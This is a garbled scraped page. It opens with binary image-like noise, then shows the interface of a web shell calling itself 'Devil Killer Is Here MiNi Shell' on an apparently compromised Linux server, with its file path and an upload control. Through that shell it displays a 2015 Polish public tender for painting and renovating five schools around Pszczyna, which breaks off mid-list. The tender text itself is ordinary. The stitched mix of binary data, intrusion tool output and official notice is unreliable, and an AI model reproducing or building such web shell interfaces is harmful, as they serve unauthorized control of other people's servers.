JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150617/146160-N-2015.html

<p class="kh_header"><b>Pszczyna: Zadanie 1
 Remont i malowanie pomieszczeń w Szkole Podstawowej nr 2 
w Pszczynie przy ul. Katowickiej 47.

Zadanie 2
Roboty malarskie w Zespole Szkolno Przedszkolnym 
w Piasku przy ul. Szkolnej 4.

Zadanie 3
Roboty malarskie w Szkole Podstawowej nr 11 
w Porębie przy ul. Świerczewskiego 8.

Zadanie 4
Roboty malarskie w Zespole Szkolno Przedszkolnym 
w Wiśle Wielkiej przy ul. Hodowców 38.

Zadanie 5
 Roboty malarskie i wymiana lamp w Zespole Szkolno Przedszkolnym 
w Studzienicach  przy ul. Szewczyka 74.</b><br>
<b>Numer ogłoszenia: 146160 - 2015; data zamieszczenia: 17.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pszczyński Zarząd Edukacji , ul. Zdrojowa 4 4, 43-200 Pszczyna, woj. śląskie, tel. 032 2102193 w. 116, faks 032 2102193 w. 118.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie 1
 Remont i malowanie pomieszczeń w Szkole Podstawowej nr 2 
w Pszczynie przy ul. Katowickiej 47.

Zadanie 2
Roboty malarskie w Zespole Szkolno Przedszkolnym 
w Piasku przy ul. Szkolnej 4.

Zadanie 3
Roboty malarskie w Szkole Podstawowej nr 11 
w Porębie przy ul. Świerczewskiego 8.

Zadanie 4
Roboty malarskie w Zespole Szkolno Przedszkolnym 
w Wiśle Wielkiej przy ul. Hodowców 38.

Zadanie 5
 Roboty malarskie i wymiana lamp w Zespole Szkolno Przedszkolnym 
w Studzienicach  przy ul. Szewczyka 74..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1  Zadanie obejmuje :
a)   częściowe licowanie ścian płytkami  w pomieszczeniu intendentki i magazynie żywności w zakresie :
- miejscowego skucia tynku  ,- dwukrotnego smarowania muru środkami grzybobójczymi, - wykonania tynku 
   uzupełniającego  - licowania ścian płytkami o wymiarach 25x35 cm  gat. I - kolor płytek do uzgodnienia z dyrekcją 
   szkoły
b)   malowanie kuchni wraz z zapleczem w zakresie: -  malowania ścian i sufitów farba emulsyjną akrylową 
   z przygotowaniem podłoża i gruntowaniem, -  malowania rur, - dwukrotnego malowania farbą olejna lamperii  
   z jednokrotnym szpachlowaniem , - malowania farbą olejną elementów metalowych ,
c)   remont pomieszczenia dla archiwum na II piętrze w zakresie : - wykucia drzwi drewnianych , - powiększenia  
   otworu drzwiowego z wykonaniem nadproża  , - dostawy i montażu drzwi stalowych przeciwpożarowych EI30 
   80x200 cm , - demontażu  posadzki z wykładziny , - wykonania warstwy wyrównawczej z zaprawy 
   samopoziomującej grub. ok. 1,5 cm  , - ułożenia wykładziny rulonowej obiektowej z wywinięciem na ściany na 
   wysokość ok. 15 cm - kolor do uzgodnienia  z dyrekcja placówki, - wywóz i utylizacje gruzu i materiałów 
   z rozbiórki zgodnie z obowiązującymi przepisami prawa, - wykonania okładziny ścian i sufitów z płyt gipsowo - 
   kartonowych grub. 12,5 mm na typu F - ogniochronnych na ruszcie metalowym, - dwukrotnego malowania ścian 
   i sufitu farbą emulsyjną akrylową z zagruntowaniem płyt,
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych .
Zadanie 2  Zadanie obejmuje   malowanie wybranych pomieszczeń w Zespole Szkolno Przedszkolnym w Piasku  tj  sale nr 2, 6, 8, pokój nauczycielski , sanitariaty chłopców i pomieszczenie nauczyciela w-fu Szkole Podstawowej nr 10  oraz częściowo  szatnię , salę zajęć na parterze,  pokój socjalny i pracy indywidualnej na piętrze  w Publicznym Przedszkolu nr 17 w zakresie : - malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem 
i gruntowaniem podłoża  - kolor do  uzgodnienia z dyrekcją placówki  , - malowania lamperii farbą olejną - kolor do uzgodnienia z dyrekcją placówki - malowania rur  i drobnych elementów metalowych , - malowania stolarki drzwiowej Zadanie obejmuje również naprawę zamków w drzwiach do sal lekcyjnych oraz zamurowanie otworu drzwiowego pomiędzy szatnią a salą zajęć wraz z otynkowaniem i pomalowaniem.
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych .
Zadanie 3  Zadanie obejmuje  malowanie kuchni wraz z zapleczem w Szkole Podstawowej nr 11 w Porębie  w zakresie :- malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem i gruntowaniem podłoża  - kolor do   uzgodnienia z dyrekcją placówki , - malowania lamperii farbą olejną - kolor do uzgodnienia z dyrekcją placówki 
- malowania rur i drobnych elementów metalowych , - lakierowania stolarki drzwiowej 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych .

Zadanie 4   Zadanie obejmuje  malowanie wybranych pomieszczeń  tj:  korytarza dolnego, pomieszczenia przy wejściu, biblioteki i sanitariatów uczniowskich w szkole oraz  korytarza dolnego , sanitariatów personelu i dzieci przy przedszkolu  w Zespole Szkolno Przedszkolnym w Wiśle Wielkiej   w zakresie :  - dwukrotnego malowania ścian 
i sufitów farbą emulsyjną lateksową Acrylatex W z  przygotowaniem   i gruntowaniem  podłoża, - dwukrotnego malowania lamperii  farbą lateksową Acrylatex W ( w dwóch kolorach),  - lakierowania stolarki drzwiowej 
- malowania rur i drobnych elementów  farbą olejną , - malowanie  rur farbą olejną 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych .
Zadanie 5 
Zadanie obejmuje :   Malowanie wybranych kuchni wraz z zapleczem oraz wymianę lamp w Zespole Szkolno Przedszkolnym w Studzienicach   w zakresie ; - malowania ścian i sufitów farbą emulsyjną akrylową 
z przygotowaniem  i gruntowaniem podłoża - kolor do  uzgodnienia z dyrekcją placówki ,- malowania lamperii farbą 
olejna   - kolor do uzgodnienia z dyrekcją placówki , - malowanie stolarki drzwiowej , - malowania rur i drobnych elementów metalowych , - lakierowanie stolarki  ,- wymiana lamp świetlówkowych hermetycznych  typu krótkiego 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych .
Przed złożeniem oferty Wykonawca powinien zapoznać się z warunkami lokalizacyjno - terenowymi i wziąć je pod uwagę przy sporządzaniu oferty..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>art. 67 ust.1 pkt 6 Pzp</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości :   
      Zadanie 1   -        400,00  zł.  ( słownie : czterysta złotych )
      Zadanie 2   -        300,00  zł.  ( słownie : trzysta  złotych )
      Zadanie 3   -        100,00  zł.  ( słownie : sto  złotych)
      Zadanie 4  -          300,00 zł.  ( słownie : trzysta  złotych
       Zadanie 5 -          100,00 zł.  ( słownie :  sto złotych)
      należy wnieść w terminie    01.07.2015 r.  do godz. 1100 przed upływem terminu składania ofert.
       Wadium w  formie innej niż pieniądz,  dopuszczonej art.45 ust 6 Prawa zamówień publicznych (Dz.U.nr223 
       poz.1655 z 2007 r.). należy złożyć w formie oryginału  w kasie PZE, czynnej :  
                                                                                     w godz.    700  - 1430  ( środa, piątek)
	         		                                          w godz.  1200  - 1430 (wtorek)
     Gwarancja zapłaty wadium winna  być  bezwarunkowa i płatna na pierwsze żądanie.
     Wadium wniesione w pieniądzu należy wpłacić przelewem  na  konto PZE.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.oświadczenie wykonawcy , że  nie zalega z opłacaniem podatków, opłat oraz  składek na ubezpieczenie zdrowotne 
       i społeczne,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - gwarancja na roboty i materiały 1 pkt. za 3 lata , 5 pkt. za 4 lata, 10 pkt. za 5 lat - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy może być dokonana tylko w sytuacji, gdy konieczność wprowadzenia takich zmian 
    wyniknie w rezultacie zdarzeń, których w chwili zawarcia umowy nie można było przewidzieć, którym nie można 
    było zapobiec, ani którym nie można przeciwdziałać, a które uniemożliwiają Wykonawcy wykonanie w części lub 
    w całości jego zadania.   Zamawiający   przewiduje zmiany umowy w przypadkach :
1	zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy,
2	wystąpienia urzędowej zmiany stawki podatku VAT zaistniałej po dacie zawarcia umowy,
3	niezależnych od stron umowy zmian organizacyjnych dotyczących osób kluczowych dla realizacji umowy (w szczególności choroby, wypadku losowego, nieprzewidzianej  zmiany   organizacyjnej).
4    zmiana podwykonawcy robót w trakcie realizacji umowy za zgodą Zamawiającego
 Zmiana postanowień umowy z uwagi na wystąpienie powyższych lub innych okoliczności niezależnych od    
Wykonawcy, może    nastąpić pod warunkiem wyrażenia zgody przez Zamawiającego.  .
Wszelkie zmiany uzupełnienia  umowy wymagają zachowania formy pisemnej w postaci aneksu do umowy 
podpisanego przez obie strony pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pze.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pszczyński Zarząd Edukacji
            43-200 Pszczyna
            ul. Zdrojowa 4
            tel.(32) 210-21-93 ,  fax wew.118 lub 115
pokój 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2015 godzina 11:00, miejsce: Pszczyński Zarząd Edukacji
            43-200 Pszczyna
            ul. Zdrojowa 4
            tel.(32) 210-21-93 ,  fax wew.118 lub 115
pokój 103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1
 Remont i malowanie pomieszczeń w Szkole Podstawowej nr 2 
w Pszczynie przy ul. Katowickiej 47..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje :
a)   częściowe licowanie ścian płytkami  w pomieszczeniu intendentki i magazynie żywności w zakresie :
- miejscowego skucia tynku  
- dwukrotnego smarowania muru środkami grzybobójczymi
- wykonania tynku uzupełniającego 
- licowania ścian płytkami o wymiarach 25x35 cm  gat. I - kolor płytek do uzgodnienia z dyrekcją szkoły
b)   malowanie kuchni wraz z zapleczem w zakresie:
-  malowania ścian i sufitów farba emulsyjną akrylową z przygotowaniem podłoża i gruntowaniem,
-  malowania rur,
- dwukrotnego malowania farbą olejna lamperii  z jednokrotnym szpachlowaniem 
- malowania farbą olejną elementów metalowych ,
c)   remont pomieszczenia dla archiwum na II piętrze w zakresie :
- wykucia drzwi drewnianych ,
- powiększenia  otworu drzwiowego z wykonaniem nadproża 
- dostawy i montażu drzwi stalowych przeciwpożarowych EI30 80x200 cm
- demontażu  posadzki z wykładziny
- wykonania warstwy wyrównawczej z zaprawy samopoziomującej grub. ok. 1,5 cm 
- ułożenia wykładziny rulonowej obiektowej z wywinięciem na ściany na wysokość ok. 15 cm - kolor do uzgodnienia 
  z dyrekcja placówki
- wywóz i utylizacje gruzu i materiałów z rozbiórki zgodnie z obowiązującymi przepisami prawa
- wykonania okładziny ścian i sufitów z płyt gipsowo - kartonowych grub. 12,5 mm na typu F - ogniochronnych na 
   ruszcie metalowym
- dwukrotnego malowania ścian i sufitu farbą emulsyjną akrylową z zagruntowaniem płyt,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja na roboty i materiały 1 kpkt za 3 lata, 5 pkt. za 4 lata , 10 pkt. za 5 lat - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2
Roboty malarskie w Zespole Szkolno Przedszkolnym 
w Piasku przy ul. Szkolnej 4..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje   malowanie wybranych pomieszczeń w Zespole Szkolno Przedszkolnym w Piasku  tj  sale nr 2, 6, 8, pokój nauczycielski , sanitariaty chłopców i pomieszczenie nauczyciela w-fu Szkole Podstawowej nr 10  oraz częściowo szatnię , salę zajęć na parterze,  pokój socjalny i pracy indywidualnej na piętrze w Publicznym Przedszkolu nr 17 w zakresie :
- malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem i gruntowaniem podłoża  - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowania lamperii farbą olejną - kolor do uzgodnienia z dyrekcją placówki 
- malowania rur  i drobnych elementów metalowych 
- malowania stolarki drzwiowej 
Zadanie obejmuje również naprawę zamków w drzwiach do sal lekcyjnych oraz zamurowanie otworu drzwiowego pomiędzy szatnią a salą zajęć wraz z otynkowaniem i pomalowaniem.
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja na roboty i materiały 1 pkt. za 3 lata , 5 pkt. za 4 lata, 10 pkt za 5 lat - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3
Roboty malarskie w Szkole Podstawowej nr 11 
w Porębie przy ul. Świerczewskiego 8..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje  malowanie kuchni wraz z zapleczem w Szkole Podstawowej nr 11 w Porębie  w zakresie :
- malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem i gruntowaniem podłoża  - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowania lamperii farbą olejną - kolor do uzgodnienia z dyrekcją placówki 
- malowania rur i drobnych elementów metalowych 
- lakierowania stolarki drzwiowej 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja na roboty i materiały 1 pkt. za 3 lata , 5 pkt. za 4 lata, 10 pkt za 5 lat - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4
Roboty malarskie w Zespole Szkolno Przedszkolnym 
w Wiśle Wielkiej przy ul. Hodowców 38..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje  malowanie wybranych pomieszczeń  tj:  korytarza dolnego, pomieszczenia przy wejściu, biblioteki i sanitariatów uczniowskich w szkole oraz  korytarza dolnego , sanitariatów personelu i dzieci przy przedszkolu 
w Zespole Szkolno Przedszkolnym w Wiśle Wielkiej   w zakresie : 
- dwukrotnego malowania ścian i sufitów farbą emulsyjną lateksową Acrylatex W z  przygotowaniem   
  i gruntowaniem  podłoża,
- dwukrotnego malowania lamperii  farbą lateksową Acrylatex W ( w dwóch kolorach)
- lakierowania stolarki drzwiowej 
- malowania rur i drobnych elementów  farbą olejną
- malowanie  rur farbą olejną 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja na roboty i materiały 1 pkt. za 3 lata , 5 pkt. za 4 lata, 10 pkt za 5 lat - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5
 Roboty malarskie i wymiana lamp w Zespole Szkolno Przedszkolnym 
w Studzienicach  przy ul. Szewczyka 74..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje :  
1. Malowanie wybranych kuchni wraz z zapleczem oraz wymianę lamp w Zespole Szkolno Przedszkolnym 
w Studzienicach   w zakresie ;
- malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem  i gruntowaniem podłoża - kolor do 
  uzgodnienia z dyrekcją placówki 
- malowania lamperii farbą olejna   - kolor do uzgodnienia z dyrekcją placówki 
- malowanie stolarki drzwiowej 
- malowania rur i drobnych elementów metalowych 
- lakierowanie stolarki 
- wymiana lamp świetlówkowych hermetycznych  typu krótkiego 
